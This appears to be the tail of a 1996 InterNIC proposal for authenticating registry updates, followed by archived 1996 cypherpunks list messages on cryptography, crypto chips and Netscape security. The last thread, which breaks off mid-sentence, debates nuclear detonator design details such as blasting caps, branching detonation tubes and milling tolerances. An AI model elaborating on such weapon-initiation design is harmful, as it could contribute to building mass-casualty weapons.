       BEFORE-USE, AFTER-USE, and NOT-CARE.
 
       BEFORE-USE      The Guardian will be notified before using the
                       Object.   
 
       AFTER-USE       The Guardian will be notified after using the
                       Object.  AFTER-USE is the default value.
 
       NOT-CARE        The Guardian will not be notified about the Object
                       use because it does not want to be notified.
 
       Currently, a Guardian's Notify Use attribute will be the same for
       all the Objects the Guardian is responsible for.  In future, it
       will be defined on a per Object basis for each of the Objects a
       Guardian is guarding.  
 
    Auth Scheme
 
       Authorization scheme used to authenticate a Guardian before updating
       the Object it is guarding.  The proposed schemes in an increasing
       order of strength are MAIL-FROM, CRYPT-PW, and PGP [1].
 
       MAIL-FROM    MAIL-FROM will parse the FROM: field in the mail header
                    of an update message and match it with the email address
                    of the Guardian guarding the Object to be updated.
                    MAIL-FROM is the default Auth Scheme.
 
 
                                                                   [Page 3]
 
       CRYPT-PW     CRYPT-PW will encrypt the cleartext password supplied
                    in an update message and match it with the encrypted
                    password of the Guardian guarding the Object to be
                    updated.  Initially when a new Guardian is being
                    registered or the authentication information is being
                    added to an existing Contact, the encrypted password
                    MUST be supplied.  The Unix crypt(3) routine SHOULD be
                    used to encrypt a cleartext password.
 
       PGP          PGP stands for Pretty Good Privacy [2].  The sender will
                    sign the update message with a Guardian's secret PGP
                    key.  The InterNIC will verify the received update
                    message with the Guardian's public PGP key.  How to
                    register a Guardian's public PGP key with the InterNIC
                    will be explained in another document.
 
    Auth Info
 
       Information for the selected authorization scheme.  The
       authentication information stored in the database for a Guardian
       registered with the InterNIC is:
 
       MAIL-FROM    Email address of a Guardian.
 
       CRYPT-PW     Encrypted password of a Guardian.
 
       PGP          Key ID of the public PGP key of a Guardian.
 
    Public
 
       Boolean indicating whether the authentication information for a
       Guardian will be public or not.  Public means visible in WHOIS.
       It can have values Y (Yes) or N (No).  The default value is Y.
 
    Note that the terms "Guardian" and "Contact with Authentication
    Information" are used interchangeably in the remaining document.
 
 
 4. Registering the Guardian Attributes
 
    There will be two alternatives available to register or update
    the Guardian attributes:
 
    -  Using the new Contact Template, or
 
    -  Using the registration templates for Domains, Networks, Autonomous
       System Numbers (ASNs), and Hosts modified to include the
       authentication information for the Contacts.
 
    Note that registering a PGP-authenticated Guardian will be a two-step
    process because the Guardian will first have to register its public
    PGP key with the InterNIC and then report the key ID as Auth Info
    using one of the above methods.
 
                                                                   [Page 4]
 
 4.1 Using the New Contact Template
 
    A new Contact Template is proposed to independently register or update
    a Contact with Authentication Information.  Appendix A describes the
    new Contact Template and its use.
 
 4.2 Using the Modified Registration Templates
 
    The registration templates for Domains, Networks, ASNs, and Hosts will
    be modified to include:
 
    a) The Authentication Information for the Contacts.
 
    b) The Authorization Section in the beginning of the template to
       authenticate the Guardian updating the Object.  It SHOULD be
       filled only when the Object is being modified or deleted, and
       if the Object is being guarded.  It has the following items:
 
       Auth Scheme
 
          Authorization scheme used to authenticate the Guardian updating
          the Object.  It can have values MAIL-FROM, CRYPT-PW, or PGP.
 
       Auth Info
 
          Information for the selected authorization scheme.  The different
          Auth Scheme and Auth Info combinations are:
 
          Auth Scheme   Auth Info
 
          MAIL-FROM     Ignored.  The FROM: field in the mail header of
                        an update message will be parsed to verify the
                        Guardian.
 
          CRYPT-PW      Cleartext password.
 
          PGP           Ignored.  The sender SHOULD sign the entire update
                        message with the secret PGP key of the Guardian
                        updating the Object and send it in cleartext to
                        the InterNIC.
    
 
 5. Linking Guardian Information to Existing Records
 
    There are two ways to link Guardian information to existing records:
 
    a) Once the authentication information is added to an existing
       Contact, all the database records the Contact is responsible for
       will be automatically guarded by that Contact and any subsequent
       update request from that Contact for one of those records will be
       first authenticated.  This approach should be used carefully because
       here a Contact guards either all or none of its Objects.
 
 
                                                                   [Page 5]
 
    b) A new Link Template is proposed to do a wholesale linkage of
       Contacts with Authentication Information (Guardian Objects) to
       database records (Guarded Objects) in a single transaction.  This
       approach is more flexible because the records that need to be
       guarded by a particular set of Guardians are listed explicitly in
       the Link Template.  Appendix B describes the new Link Template and
       its use.
 
 
 6. Notification
 
    The rules to update or use an Object will depend on when its Contacts
    are notified.
 
    There are two types of notification:
 
    Active Notification
 
       If the Notify Update attribute for a Contact of an Object is set to
       BEFORE-UPDATE, the Contact will be notified before updating the
       Object and the request will only be processed if an ACK
       (Acknowledgement) is received.
 
       If the Notify Use attribute for a Contact of an Object is set to
       BEFORE-USE, the Contact will be notified before using the Object
       and the request will only be processed if an ACK is received.
 
    Passive Notification
 
       If the Notify Update attribute for a Contact of an Object is set to
       AFTER-UPDATE, the Contact will be notified after the Object has been
       updated and the processed request will be revoked if a NAK (Negative
       Acknowledgement) is received.
 
       If the Notify Use attribute for a Contact of an Object is set to
       AFTER-USE, the Contact will be notified after the Object has been
       used and the processed request will be revoked if a NAK is received.
 
    An ACK or a NAK MUST be received within a certain time interval to
    be effective.  Clearly, active notification is safer than passive
    notification.  Appendix C describes the new Notify Template and
    its use.
 
 
 7. Object Update Rules
 
    A request to update an Object could possibly come from a Contact
    with Authentication Information, a Contact without Authentication
    Information or a sender not listed as a Contact for the Object. 
 
 
 
                                                                   [Page 6]
 
    The Object Update Rules for such requests are:
 
 7.1 Request from a Contact with Authentication Information
 
    The request will be processed immediately with notification to all
    the Contacts with Notify Update attribute set to BEFORE-UPDATE or
    AFTER-UPDATE.
 
 7.2 Request from a Contact without Authentication Information
 
 7.2.1 Object has at least one Contact with Authentication Information
 
    All the Contacts with Authentication Information will be notified before
    processing the request.  If the InterNIC receives an ACK first before
    the waiting time indicated on the Notify Template expires, the request
    will be processed.  Otherwise, the request will NOT be processed.
 
 7.2.2 Object has no Contacts with Authentication Information
 
 7.2.2.1 Object has at least one of the other Contacts with Notify Update
         Attribute set to BEFORE-UPDATE
 
    All the other Contacts with Notify Update attribute set to BEFORE-UPDATE
    will be notified before processing the request.  If the InterNIC
    receives an ACK first before the waiting time indicated on the Notify
    Template expires, the request will be processed.  Otherwise, the request
    will NOT be processed.
 
 7.2.2.2 Object has none of the other Contacts with Notify Update Attribute
         set to BEFORE-UPDATE
 
    The request will be processed immediately with notification to all
    the Contacts with Notify Update attribute set to AFTER-UPDATE.  The
    Contacts with Notify Update attribute set to NOT-CARE will not be
    notified.
 
 7.3 Request from a Sender not listed as a Contact
 
    All the Contacts will be notified before processing the request.  If
    the InterNIC receives an ACK first before the waiting time indicated
    on the Notify Template expires, the request will be processed.
    Otherwise, the request will NOT be processed.
 
    If the request from a sender not listed as a Contact is rejected, the
    sender MUST present an evidence that the organization using the Object
    has approved it to update the Object.  Another request from the same
    sender must be faxed to the InterNIC on the corporate letterhead and
    must contain the tracking number of the initial request.  The sender
    could also present its contract with the organization using the Object.
 
    Appendix D gives a summary of the Object Update Rules.
 
 
                                                                   [Page 7]
 
 8. Object Use Rules
 
    One of the more common registration problems is a Domain holder using
    without permission someone else's DNS servers or someone else's IP
    addresses to number its DNS servers.  The Object Use Rules will help
    prevent such illegal use of Objects, particularly Hosts and Networks.
 
    A request to use an Object could possibly come from one of its Contacts
    or a sender not listed as a Contact for the Object.
 
    The Object Use Rules for such requests are:
 
 8.1 Request from a Contact
 
    The request will be processed immediately with notification to all the
    Contacts with Notify Use attribute set to BEFORE-USE or AFTER-USE.
 
 8.2 Request from a Sender not listed as a Contact
 
 8.2.1 Object to be used has at least one Contact with Notify Use Attribute
       set to BEFORE-USE
 
    All the Contacts with Notify Use attribute set to BEFORE-USE will be
    notified before processing the request.  If the InterNIC receives an
    ACK first before the waiting time indicated on the Notify Template
    expires, the request will be processed.  Otherwise, the request will
    NOT be processed.
 
 8.2.2 Object to be used has no Contact with Notify Use Attribute set to
       BEFORE-USE
 
    The request will be processed immediately with notification to all the
    Contacts with Notify Use attribute set to AFTER-USE.  The Contacts with
    Notify Use attribute set to NOT-CARE will not be notified.
 
    Appendix E gives a summary of the Object Use Rules.
 
 
 9. Other Guardian Issues
 
 9.1 Number of Guardians per Object
 
    The number of Guardians for an Object will be equal to the number of
    its Contacts with Authentication Information.  Each Guardian will have
    an equal authority to make changes to the Object.  In future, multiple
    Contacts of the same type (for example, Technical) will be allowed for
    an Object.
 
    If an Object has no Contacts with Authentication Information, it will
    not be guarded at all.  
 
 
                                                                   [Page 8]
 
 9.2 Protecting Guardian Information
 
    By default, a Guardian will guard itself (that is, only the Guardian
    will have the authority to make changes to its information).  However,
    a Guardian can be guarded by another Guardian.
 
    If a Guardian is guarding itself and needs to update its authentication
    information or scheme, the update message MUST contain the Guardian's
    old authentication information.  Otherwise, the Guardian can not be
    authenticated before the update.  For example, if a Guardian's Auth
    Scheme is MAIL-FROM, and it needs to either update its email address
    or change its Auth Scheme, the update message must come from its old
    email address.
 
 9.3 Displaying Guardian Information
 
    The authentication information for a Guardian will be visible in WHOIS
    unless the Guardian chooses to keep it private.  This information will
    be public by default because a Guarded Object should be protected by
    the inherent strength of the selected authorization scheme rather than
    by hiding the authorization information for its Guardian.
 
    The WHOIS display for a Guarded Object will be extended to indicate
    that the Object is being guarded.  
 
 
 10. Conclusion
 
    The increased market value of the Objects registered with the InterNIC,
    particularly Domains and Networks, has necessitated the need for more
    secure database transactions.  This Guardian proposal will help solve
    most of the current, unauthorized Object update and use problems at
    the InterNIC.  It balances operational expediency with stronger
    authorization by allowing the Contacts of an Object to select the
    appropriate level of security (MAIL-FROM, CRYPT-PW, or PGP) for the
    Object.
 
 
 11. References
 
    [1] Karrenberg, D., Terpstra, M., "Authorisation and Notification of
        Changes in the RIPE Database", ripe-120, RIPE NCC, RIPE NCC.
 
    [2] Garfinkel, S., "PGP Pretty Good Privacy", O'Reilly & Associates,
        Inc.
 
 
 12. Acknowledgements
 
    The authors thank the InterNIC staff for some very useful suggestions,
    especially Eric Eden, Tom Newell, Kim Hubbard, Duane Stone, and Carley
    Johnson.
 
 
                                                                   [Page 9]
 
 Appendix A
 
 The Proposed Contact Template
 
    [ URL ftp://rs.internic.net/templates/Contact-template.txt ]   [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Contact Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    Authorization
    0a. Auth Scheme.............:
    0b. Auth Info...............:
 
    1.  (N)ew (M)odify (D)elete.:
 
    Contact Information
    2a. NIC Handle..............:
    2b. Name....................:
    2c. (I)ndividual (R)ole.....:
    2d. Street Address..........:
    2e. City....................:
    2f. State...................:
    2g. Postal Code.............:
    2h. Country Code............:
    2i. Phone Number............:
    2j. Fax Number..............:
    2k. E-Mailbox...............:
 
    Notify Information
    3a. Notify Update...........:
    3b. Notify Use..............:
 
    Authentication Information
    4a. Auth Scheme.............:
    4b. Auth Info...............:
    4c. Public (Y/N)............:
 
    The Contact Template will be used to independently register or update a
    Contact (with or without Authentication Information).
 
 
 
 
 
 
 
                                                                  [Page 10]
 
    Items 0a-0b SHOULD be filled only when a Contact is being modified or
    deleted, and if the Contact is being guarded.  These items contain
    the information to authenticate the Guardian updating the Contact.
    Item 0a is the authorization scheme for that Guardian.  It can have
    values MAIL-FROM, CRYPT-PW, or PGP.  Item 0b is the information for
    the selected authorization scheme.  The different items 0a and 0b
    combinations are:
 
    Item 0a      Item 0b
 
    MAIL-FROM    Ignored.  The FROM: field in the mail header of an update
                 message will be parsed to verify the Guardian.
 
    CRYPT-PW     Cleartext password.
 
    PGP          Ignored.  The sender SHOULD sign the entire update message
                 with the secret PGP key of the Guardian updating the
                 Contact and send it in cleartext to the InterNIC.
 
    Item 1 is the registration action type.  It can have values N, M, or D.
    N registers a new Contact.  M modifies the information for an existing
    Contact.  D deletes an existing Contact if it is no longer linked to
    any Object.
 
    Items 2a-2k contain the basic information for a Contact.  Item 2a is
    the NIC handle assigned to a Contact.  Items 2b, 2c, 2d-2h, 2i, 2j,
    and 2k are respectively the Name, Type, Address, Phone, Fax, and Email
    attributes of a Contact.
 
    Items 3a-3b contain the notification information for a Contact.
    Items 3a and 3b are respectively the Notify Update and Notify Use
    attributes of a Contact.
 
    Items 4a-4c contain the authentication information for a Contact.
    These items are optional, and are required only if either the
    authentication information is being added to an existing Contact or
    a new Contact with Authentication Information is being registered.
    Items 4a, 4b, and 4c are respectively the Auth Scheme, Auth Info,
    and Public attributes of a Guardian.
 
 
 
 
 
 
 
                                                                  [Page 11]
 
 Appendix B
 
 The Proposed Link Template
 
    [ URL ftp://rs.internic.net/templates/link-template.txt ]      [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Link Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    0.  (N)ew (M)odify (D)elete.:
 
    Object
    1a. Identifier..............:
    1b. Type....................:
    1c. Function................:
 
    Linked Object
    2a. Identifier..............:
    2b. Type....................:
 
    The Link Template will be used to do wholesale database changes in a 
    single transaction.  Some of the more commonly requested database
    changes are:
 
    a) Link or unlink Contacts (with or without Authentication Information)
       to or from existing Domains, Networks, ASNs, and Hosts.
 
    b) Link or unlink DNS servers to or from existing Domains and Networks.
 
    Item 0 is the registration action type.  It can have values N, M, or D.
    N links the Objects (Contacts or DNS servers) in the Object Sections to
    the Objects (Domains, Networks, ASNs, and Hosts) in the Linked Object
    Sections.  M modifies the linkage.  D unlinks the Objects in the Object
    Sections from the Objects in the Linked Object Sections.
 
    Items 1a-1c contain information for an Object (Contact or DNS server)
    in the Object Section.  Item 1a is the Identifier of the Object.
    Item 1b is the Type of the Object.  Item 1c is optional and is required
    only if the Object is a Contact.  It is the Function Type of a Contact.
    It can have values AC (Administrative Contact), TC (Technical Contact),
    or BC (Billing Contact).  The Object Section SHOULD be copied for each
    Object (Contact or DNS server).
 
    Items 2a-2b contain information for an Object (Domain, Network, ASN, or
    Host) in the Linked Object Section.  Item 2a is the Identifier of the
    Object.  Item 2b is the Type of the Object.  The Linked Object Section
    SHOULD be copied for each Object (Domain, Network, ASN, or Host).
 
 
 
 
                                                                  [Page 12]
 
    The different Identifiers and Types of the Objects are:
 
    Object     Identifier                 Type
 
    Domain     NIC Handle/Domain Name      D
    Network    NIC Handle/Network Name     N
    ASN        NIC Handle/AS Name          A
    Host       NIC Handle/Host Name        H
    Contact    NIC Handle                  I/R
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                  [Page 13]
 

 
 Appendix C
 
 The Proposed Notify Template
 
    [ URL ftp://rs.internic.net/templates/notify-template.txt ]    [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Notify Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    0a. (A)ck (N)ak.....:
    0b. Comments........:
 
    Object
    1a. Identifier......:
    1b. Type............:
    1c. Tracking Number.:
 
    The Notify Template will be used to notify a Contact of an Object
    before or after updating or using the Object, and get its approval.
    The InterNIC will fill in the information for the requested Object
    update or use in the template (Items 1a-1c) and send it to a Contact
    of the Object for approval.  The Contact will, in turn, fill in the
    ACK/NAK response in the template (Items 0a-0b) and send it back to
    the InterNIC.  If no ACK or NAK is received within 4 days for an
    Object update request or 2 days for an Object use request, the
    InterNIC may assume an implicit ACK or NAK depending on the type of
    request.
 
    Items 0a-0b contain the response from a Contact.  Item 0a is the
    ACK/NAK response.  It can have values A (Ack) or N (Nak).  Item 0b
    contains the comments from the Contact on the approval or disapproval
    of the request.
 
    Items 1a-1c contain information for the requested Object update or use.
    Item 1a is the Identifier of the Object.  Item 1b is the Type of the
    Object. Item 1c is the Tracking Number of the request.
 
    The different Identifiers and Types of the Objects are:
 
    Object     Identifier                 Type
 
    Domain     NIC Handle/Domain Name      D
    Network    NIC Handle/Network Name     N
    ASN        NIC Handle/AS Name          A
    Host       NIC Handle/Host Name        H
    Contact    NIC Handle                  I/R
 
 
 
 
 
                                                                  [Page 14]
 

 
 Appendix D
 
 Object Update Rules
 
    IF Request from a Contact with Authentication Information
      Passive Notification to all the Contacts with Notify Update attribute
      set to BEFORE-UPDATE or AFTER-UPDATE after updating the Object
    ELSE IF Request from a Contact without Authentication Information
      IF Object has at least one Contact with Authentication Information
        Active Notification to these Contacts before updating the Object
      ELSE
        IF Object has at least one of the other Contacts with Notify Update
           attribute set to BEFORE-UPDATE
          Active Notification to these Contacts before updating the Object
        ELSE
          Passive Notification to all the Contacts with Notify Update
          attribute set to AFTER-UPDATE after updating the Object
        ENDIF
      ENDIF
    ELSE IF Request from a Sender not listed as a Contact
      Notification to all the Contacts before updating the Object
      IF the InterNIC receives an ACK
        Object updated
      ELSE IF the Sender faxes a copy of its contract with the Object Holder
        Object updated
      ELSE IF the Object Holder faxes the request on corporate letterhead 
        Object updated
      ELSE
        Object not updated
      ENDIF
    ENDIF
 
    Active Notification:
 
    IF the InterNIC receives an ACK first within 4 days
      Object updated
    ELSE
      Object not updated
    ENDIF
 
    Passive Notification:
 
    IF the InterNIC receives a NAK first within 4 days
      Object update revoked
    ELSE
      OK
    ENDIF
 
 
 
 
 
 
 
                                                                  [Page 15]
 

 
 Appendix E
 
 Object Use Rules
 
    IF Request from a Contact
      Passive Notification to all the Contacts with Notify Use attribute
      set to BEFORE-USE or AFTER-USE after using the Object
    ELSE IF Request from a Sender not listed as a Contact
      IF Object has at least one Contact with Notify Use attribute
         set to BEFORE-USE
        Active Notification to these Contacts before using the Object
      ELSE
        Passive Notification to all the Contacts with Notify Update
        attribute set to AFTER-USE after using the Object
      ENDIF
    ENDIF
 
    Active Notification:
 
    IF the InterNIC receives an ACK first within 2 days
      Object used
    ELSE
      Object not used
    ENDIF
 
    Passive Notification:
 
    IF the InterNIC receives a NAK first within 2 days
      Object use revoked
    ELSE
      OK
    ENDIF
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                  [Page 16]
 

 
 Appendix F
 
 Examples
 
 F.1 How to Register a New Contact with Authentication Information
 
    [ URL ftp://rs.internic.net/templates/Contact-template.txt ]   [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Contact Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    Authorization
    0a. Auth Scheme.............:
    0b. Auth Info...............:
 
    1.  (N)ew (M)odify (D)elete.: N
 
    Contact Information
    2a. NIC Handle..............:
    2b. Name....................: Xary Y. Zmith
    2c. (I)ndividual (R)ole.....: I
    2d. Street Address..........: Fictitious Street
    2e. City....................: Imaginary
    2f. State...................: VA
    2g. Postal Code.............: 22079
    2h. Country Code............: US
    2i. Phone Number............: 1-703-999-8484
    2j. Fax Number..............: 1-703-999-8485
    2k. E-Mailbox...............: xyz@internic.net
 
    Notify Information
    3a. Notify Update...........: BEFORE-UPDATE
    3b. Notify Use..............: AFTER-USE
 
    Authentication Information
    4a. Auth Scheme.............: CRYPT-PW
    4b. Auth Info...............: %.d!Hr3@rm.Gh
    4c. Public (Y/N)............: Y
 
    Here, a new Contact Xary Y. Zmith is registered with CRYPT-PW as its
    Auth Scheme.  The Contact will be notified before updating or after
    using an Object it is responsible for.  The authentication information
    for the Contact will be visible in WHOIS.
 
 
 
 
 
 
 
 
                                                                  [Page 17]
 

 
 F.2 How to Link Guardian Information to Existing Records
 
    [ URL ftp://rs.internic.net/templates/link-template.txt ]      [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Link Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    0.  (N)ew (M)odify (D)elete.: N
 
    Object
    1a. Identifier..............: XYZ10000
    1b. Type....................: I
    1c. Function................: TC
 
    Linked Object
    2a. Identifier..............: HOST.EXAMPLE.COM
    2b. Type....................: H
 
    In Example F.1, the new Contact is registered with NIC handle XYZ10000.
    Here, the Contact XYZ10000 is linked as Technical Contact to the Host
    HOST.EXAMPLE.COM.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                  [Page 18]
 

 
 F.3 How to Update a Guarded Record
 
    [ URL ftp://rs.internic.net/templates/Contact-template.txt ]   [ 1/96 ]
 
    ***************** Please DO NOT REMOVE Version Number *****************
 
    Contact Version Number: 1.0
 
    ************** Please see attached detailed instructions **************
 
    Authorization
    0a. Auth Scheme.............: CRYPT-PW
    0b. Auth Info...............: Cleartext Password
 
    1.  (N)ew (M)odify (D)elete.: M
 
    Contact Information
    2a. NIC Handle..............: XYZ10000
    2b. Name....................:
    2c. (I)ndividual (R)ole.....:
    2d. Street Address..........:
    2e. City....................:
    2f. State...................:
    2g. Postal Code.............:
    2h. Country Code............:
    2i. Phone Number............: 1-703-999-8486
    2j. Fax Number..............:
    2k. E-Mailbox...............:
 
    Notify Information
    3a. Notify Update...........:
    3b. Notify Use..............:
 
    Authentication Information
    4a. Auth Scheme.............:
    4b. Auth Info...............: 
    4c. Public (Y/N)............:
 
    Here, the authorization information in items 0a-0b is first verified
    and then the record for the Contact XYZ10000 is updated. 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                  [Page 19]
 

 
 F.4 WHOIS Display of Guardian Information
 
    Whois: XYZ10000
 
    Zmith, Xary Y. (XYZ10000)                xyz@INTERNIC.NET
       Fictitious Street
       Imaginary, VA 22079
       (703) 999-8486
       (703) 999-8485
 
       Auth Scheme: CRYPT-PW %.d!Hr3@rm.Gh
 
       Record last updated on 18-Jan-96.
 
    Here, the WHOIS display of the Guardian XYZ10000 contains its
    authentication information because its Public attribute is set to Y.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                  [Page 20]
 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sun, 25 Feb 1996 10:09:03 +0800
To: ipgsales@cyberstation.net
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <8320.9602241346@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger <perry@piermont.com> writes:
> Dan Bailey writes:
> > My suggestion
> > is to post the OTP-expansion algorithm to sci.crypt.
> 
> Call it what it is -- a pseudo-random number generator, at best. As

I think this is the crux of the problem - they are simply misnaming
their proprietry algorithm.

I don't see any stigma attached with IPG admitting they have a PRNG
seeded with a key, and XORing the PRNG stream with the data - this is
exactly what RC4 does.  But of course RC4 (now) has the advantage of
open review, and before that it had the advantage of Ron Rivests
reputation associated with it.  Simply change all the literature to
replace "OTP" with "PRNG", or "seed" in appropriate places.

So, submitting your PRNG for open peer review would be a good start.
But I don't think the fact that IPG generates the keys for their
clients is good.  I don't see this as a viable key distribution
mechanism.

But you *really* must stop equating your system with a one time pad,
it absolutely is NOT a OTP.

> you likely know (but the IPG folks don't seem to care) you can't
> "expand" a one time pad. One time means ONE TIME. Look at how the NSA
> broke the Venona intercepts of of even two-time use of keying material.

exactly.

I do hope IPG will take the trouble to consider comments such as this,
and Perrys comments above, if they are at all serious about their
system every gaining any reputation.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 25 Feb 1996 03:34:29 +0800
To: cypherpunks@toad.com
Subject: Alternative to e$
Message-ID: <9602241906.AA10012@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Why not use the name Electronic Cash Unit, abreviated ECU?

:-)

JFA
**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 25 Feb 1996 07:37:19 +0800
To: cypherpunks@toad.com
Subject: SGI Nabs Crayfish
Message-ID: <199602241914.OAA27723@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


2-24-96. NYT:


John Markoff reports that SGI will buy Cray Research.


It notes Cray's last gasping, grasping at SGI's grab hand 
nabbing crawfish.


An SGI/Cray super-gabfeast Monday.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 25 Feb 1996 03:48:04 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
In-Reply-To: <m0tqMqf-00091UC@pacifier.com>
Message-ID: <199602241929.OAA19522@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Faking crypto chips for public algorithims is theoretically
more difficult, because its simple to create a DES_verify routine to make
sure your DES chip is working right.  Its more difficult to
near-impossible if the chip picks the key, as it must to avoid easy
rouge implementations.

	If the rouge implementation can choose a key, then it can
pre-calculate the appropriate checksum, and then simply tell the other
unit "We're going to use this key."  Thus, keys need to be chosen by
the chip, making it tough to see if the chip is functioning properly.
I suspect the NSA knew this.

	For more on rouges, see Matt Blaze's paper, on
ftp.research.att.com/dist/mab/keyescrow or somesuch.

jim bell wrote:

| I noted long ago that one disadvantage with having a single, standardized 
| encryption chip (like Clipper, even with the key-escrow un-enabled) is that 
| the NSA has plenty of money in its budget to build a fake chip that can be 
| installed during a black-bag job.  True, if they could fake one chip they 
| could fake 10, but it's harder to do and the demand for any single kind of 
| chip might drop to one per year.   Unfortunately, a sufficiently-complex 
| FPLD would probably sub for anything if it were in the right package...
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 25 Feb 1996 05:10:06 +0800
To: cypherpunks@toad.com
Subject: Re: REM_ote
In-Reply-To: <199602241942.OAA19580@homeport.org>
Message-ID: <199602242031.OAA01806@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> 	Until there's security oriented configurability, I can't say
> Netscape has anything better than an acceptable record.  They do a
> decent job of fixing the bugs, but only if you can enfore deployment
> of a new version, and ensure that old, bad features are not used.

I guess that I have confidence in Netscape because they have a history of 
responding to concerns posted here and elsewhere.  Security oriented 
configurability will be a good test -- I would be surprised if it doesn't 
come out soon.

What are we talking about specifically when we talk about security
oriented configurability?  Rather than just turning java(script) on and
off, wouldn't it be useful to piggyback off of the X.509 system that's
already in place?

For every CA's or server's cert, they'd just have to add two checkboxes:  
whether or not to run java applets or javascript code from servers 
vouched for by those certs.  Is that what people mean when they talk 
about configurability, or just the ability to shut down java*script) all 
together?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 25 Feb 1996 04:04:46 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: REM_ote
In-Reply-To: <199602240441.WAA00378@proust.suba.com>
Message-ID: <199602241942.OAA19580@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I'm going to disagree.  Netscape needs to add configurability
if they are going to sell proprietary standards that people employ in
offering information.  I recently wrote a proposal for 2 "Netscape
stations," machines which would not be networked, but be available for
use with Netscape 2.  Sort of a shame to use dialup modems in place of
the high speed internet connection, but security concerns stemming
from an inability to guarantee Java & Javascript are not running cause
me to feel that this would be the best solution.

	Until there's security oriented configurability, I can't say
Netscape has anything better than an acceptable record.  They do a
decent job of fixing the bugs, but only if you can enfore deployment
of a new version, and ensure that old, bad features are not used.

Adam


| > Marianne Mueller is a Sun employee, not a Netscape employee. The
| > original quote did not make that clear.
| 
| Again, I apologize to Ms. Meuller and to Netscape.
| 
| In my opinion Netscape has a great track record of addressing concerns and
| problems with its software.  Other companies would do well to use
| Netscape's policy of addressing and correcting proven security problems,
| instead of denying and downplaying them, as a model. 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 25 Feb 1996 05:15:10 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [Off topic] Re: Easy Nuclear Detonator
In-Reply-To: <m0tqAvX-000958C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960224150250.18049A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



This will be my last reply on the subject.

On Fri, 23 Feb 1996, jim bell wrote:

> At 08:05 PM 2/22/96 -0500, Black Unicorn wrote:

> >Your intermediary chamber, if surrounding the blasting cap, is likely to 
> >detonate to one side first, at a right angle to the axis of the chamber 
> >to the explosive assembly. 
> 
> What I anticipated, to tell you the truth, was a long intermediary thin tube 
> (again, 1 mm diameter for concreteness, just as an example) BETWEEN a 
> chamber surrounding the cap, and the secondary chamber.  (the secondary 
> chamber would be carefully designed to spread the shock front evenly)   I 
> fully intended to avoid all of the possible consequences of weird explosive 
> modes in common blasting caps.

Then you still have the problem of the connection of the exceedingly thin 
tube to your starfish/wagon wheel where the individual tubes branch off 
to the compressive explosive assembly.  This puts you right back to 
square one, the need to mill these connections with exceedingly close 
tolerances.
 
> What really mystifies me is that you would think somebody who was 
> intelligent enough to be capable of building a bomb could possibly be 
> unaware of the strange behavior of common blasting caps?  Do you think we're 
> all stupid out here?!?

Considering that you never discussed the specifics of blasting caps or 
the manner in which they might influence your design, I think the safe 
assumption is that you never thought of it.  Your paragraph above is poor 
spin control in that regard.

> Last time I talked to Dr. Edgerton in his lab (You _do_ know about Dr. 
> Edgerton, don't you?!?  EG+G?), in about 1978 or so, he showed me some 
> interesting pictures he had taken of blasting caps exploding, and the weird 
> patterns they made.  Believe me, from that moment onwards I had no illusions 
> about the predictability of the common blasting cap.  

This is name dropping.  The reader will notice the need to bolster 
credibility by association with a "big" name.  The conclusions are obvious.

> BTW, the reason Edgerton paid a bit of attention to ME, as opposed to 
